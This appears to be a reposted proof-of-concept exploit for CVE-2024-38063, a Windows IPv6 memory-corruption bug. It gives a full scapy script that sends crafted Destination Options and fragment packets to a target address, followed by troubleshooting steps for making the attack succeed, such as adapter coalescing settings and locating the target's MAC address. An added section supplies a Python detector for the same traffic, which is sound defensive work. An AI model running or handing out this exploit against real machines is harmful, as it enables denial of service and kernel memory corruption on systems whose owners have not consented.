Found by Wei
DoS
https://github.com/ynwarcs/CVE-2024-38063
from scapy.all import *
import time

iface = ''       # interface to send from
ip_addr = ''     # target IPv6 address
mac_addr = ''    # target MAC address (leave empty to let scapy resolve it)
num_tries = 20
num_batches = 20

def get_packets_with_mac(i):
    frag_id = 0xdebac1e + i
    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
    return [first, second, third]

def get_packets(i):
    if mac_addr != '':
        return get_packets_with_mac(i)
    frag_id = 0xdebac1e + i
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
    return [first, second, third]

final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)

print("Sending packets")
if mac_addr != '':
    sendp(final_ps, iface)
else:
    send(final_ps, iface)

for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")
Troubleshooting
If it's not working, it could be because:
- The target system can't be reached via IPv6:
  - Disable the Windows firewall
  - ping -6 {ipv6_address} from the host PC
  - Make sure you're getting a response
  - Re-enable the firewall
- The target system is not receiving packets
  - Install Wireshark on the target system and check that the packets sent by the script are arriving
- scapy is reporting "Mac address to reach destination not found. Using broadcast."
  - You need to find the MAC address of the target machine
  - This can be done by running the ping command from above and checking the reply in Wireshark (eth source address field)
  - You could also use scapy: Ether(raw(sr1(IPv6(dst={your_dest_ip})/ICMPv6EchoRequest()))).src, but this doesn't work sometimes
  - Once you have the MAC address, put it in the mac_addr field in the script and run the script
- Packets are not being coalesced on the target system
  - Depending on your network adapter / driver, it may be hard to get Windows to coalesce packets without resorting to something like flooding the target akin to a DDoS.
  - You can try to modify your adapter settings, e.g. "Packet Coalescing", "Interrupt Moderation", "Interrupt Moderation Mode", "Recv Segment Coalescing", depending on which ones are available. For example, setting "Interrupt Moderation Mode" to "Extreme" on my dedicated server makes the vulnerability reproducible.
  - If all else fails, you can attach a kernel debugger and check a few things:
    - Is tcpip!Ipv6pReceiveDestinationOptions -> tcpip!Ipv6pProcessOptions -> tcpip!IppSendErrorList being hit?
    - Break on tcpip!Ipv6pProcessOptions and check whether [rcx] is zero all of the time. If yes, then packets are not being coalesced for some reason.
    - Break on tcpip!Ipv6pReceiveFragment and check if [rcx+0x30] is equal to zero. If not, then the vulnerability failed to be triggered for some reason.
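As an added defender-side example (not part of the original PoC or the ynwarcs repository): a dependency-free Python walker over IPv6 extension headers that flags the two traits the traffic above has, so a sensor or pcap post-processor can surface it. It reports any Hop-by-Hop or Destination Options option whose top two bits are 10, the class a receiver must discard and answer with an ICMPv6 Parameter Problem (the Ipv6pReceiveDestinationOptions -> Ipv6pProcessOptions -> IppSendErrorList path the debugger checklist names), first fragments that carry no upper-layer header, and fragment sets whose reassembled datagram would have fit in one minimum-MTU packet. The sample packets, the addresses fe80::1 / fe80::2, the helper names and the 1280-byte threshold are my assumptions, constructed inline so the block runs offline.

```python
import struct
from typing import Dict, List, Tuple

# Extension header "next header" values (RFC 8200) handled by the walker.
HOP_BY_HOP, FRAGMENT, DEST_OPTS, NO_NEXT = 0, 44, 60, 59
OPTION_HEADERS = {HOP_BY_HOP: "hop-by-hop", DEST_OPTS: "destination-options"}
IPV6_MIN_MTU = 1280  # assumed threshold: a datagram this small never needed fragmenting


def parse_options(body: bytes) -> List[dict]:
    """Split the option area of a Hop-by-Hop / Destination Options header into TLVs."""
    opts, i = [], 0
    while i < len(body):
        otype = body[i]
        if otype == 0:                      # Pad1: single zero byte, no length field
            opts.append({"type": 0, "len": 0})
            i += 1
            continue
        if i + 1 >= len(body):
            raise ValueError("truncated option header")
        olen = body[i + 1]
        if i + 2 + olen > len(body):
            raise ValueError("option length runs past the extension header")
        opts.append({"type": otype, "len": olen})
        i += 2 + olen
    return opts


def parse_ipv6(pkt: bytes) -> dict:
    """Walk the extension-header chain of one raw IPv6 packet (no link layer)."""
    if len(pkt) < 40 or pkt[0] >> 4 != 6:
        raise ValueError("not an IPv6 packet")
    payload_len, nh, hlim = struct.unpack("!HBB", pkt[4:8])
    end = min(len(pkt), 40 + payload_len)
    info = {"src": pkt[8:24], "dst": pkt[24:40], "hop_limit": hlim,
            "chain": [], "unrecognized_options": [], "fragment": None}
    off = 40
    while True:
        if nh in OPTION_HEADERS:
            if off + 2 > end:
                raise ValueError("truncated options header")
            next_nh, ext_len = pkt[off], pkt[off + 1]
            hlen = (ext_len + 1) * 8
            if off + hlen > end:
                raise ValueError("options header longer than payload")
            for o in parse_options(pkt[off + 2:off + hlen]):
                # Top two bits 10 = "discard and send ICMPv6 Parameter Problem".
                if o["type"] & 0xC0 == 0x80:
                    info["unrecognized_options"].append({"header": OPTION_HEADERS[nh], **o})
            info["chain"].append(OPTION_HEADERS[nh])
        elif nh == FRAGMENT:
            if off + 8 > end:
                raise ValueError("truncated fragment header")
            next_nh, _res, off_flags, frag_id = struct.unpack("!BBHI", pkt[off:off + 8])
            hlen = 8
            info["fragment"] = {"id": frag_id, "offset": off_flags >> 3,
                                "more": bool(off_flags & 1), "payload_len": end - off - 8}
            info["chain"].append("fragment")
        else:
            break
        nh, off = next_nh, off + hlen
    info["upper_protocol"] = nh
    return info


def assess(pkt: bytes) -> List[str]:
    """Per-packet findings for the traits described above."""
    info = parse_ipv6(pkt)
    findings = []
    for o in info["unrecognized_options"]:
        findings.append(f"{o['header']} option type 0x{o['type']:02x} "
                        f"forces an ICMPv6 Parameter Problem error path")
    f = info["fragment"]
    if f and f["offset"] == 0 and f["more"] and info["upper_protocol"] == NO_NEXT:
        findings.append("first fragment carries no upper-layer header (next header 59)")
    return findings


def suspicious_fragment_sets(pkts: List[bytes]) -> Dict[Tuple[bytes, bytes, int], dict]:
    """Group fragments by (src, dst, id); keep complete sets that never needed fragmenting."""
    sets: Dict[Tuple[bytes, bytes, int], dict] = {}
    for p in pkts:
        info = parse_ipv6(p)
        f = info["fragment"]
        if f is None:
            continue
        s = sets.setdefault((info["src"], info["dst"], f["id"]),
                            {"fragments": 0, "bytes": 0, "complete": False})
        s["fragments"] += 1
        s["bytes"] += f["payload_len"]
        if not f["more"]:
            s["complete"] = True
    return {k: v for k, v in sets.items()
            if v["complete"] and 40 + v["bytes"] <= IPV6_MIN_MTU}


# Constructed sample packets (fe80::1 -> fe80::2, hop limit 64); not captured traffic.
SRC = b"\xfe\x80" + b"\x00" * 13 + b"\x01"
DST = b"\xfe\x80" + b"\x00" * 13 + b"\x02"
FRAG_ID = b"\x0d\xeb\xac\x1e"
# IPv6 + Destination Options (8 bytes): option type 0x81, length 3, "aaa", then Pad1.
PKT_DESTOPT = b"\x60\x00\x00\x01\x00\x08\x3c\x40" + SRC + DST + b"\x3b\x00\x81\x03aaa\x00"
# IPv6 + Fragment header (offset 0, M=1) + 8 data bytes.
PKT_FRAG_FIRST = b"\x60\x00\x00\x01\x00\x10\x2c\x40" + SRC + DST + b"\x3b\x00\x00\x01" + FRAG_ID + b"a" * 8
# IPv6 + Fragment header (offset 1, M=0), no data.
PKT_FRAG_LAST = b"\x60\x00\x00\x01\x00\x08\x2c\x40" + SRC + DST + b"\x3b\x00\x00\x08" + FRAG_ID
# IPv6 + ICMPv6 echo request as a benign control (checksum left zero).
PKT_ECHO = b"\x60\x00\x00\x00\x00\x08\x3a\x40" + SRC + DST + b"\x80\x00\x00\x00\x00\x01\x00\x01"

if __name__ == "__main__":
    for name, p in [("destopt", PKT_DESTOPT), ("frag-first", PKT_FRAG_FIRST),
                    ("frag-last", PKT_FRAG_LAST), ("echo", PKT_ECHO)]:
        print(name, assess(p))
    print(suspicious_fragment_sets([PKT_DESTOPT, PKT_FRAG_FIRST, PKT_FRAG_LAST, PKT_ECHO]))
```

Feed it the IPv6 payload of each frame (strip the 14-byte Ethernet header first); the per-packet option check is the high-signal rule, and the fragment-set check adds context when a sensor sees the whole exchange. Routing headers are not walked and are treated as the upper-layer protocol, which is conservative for this purpose.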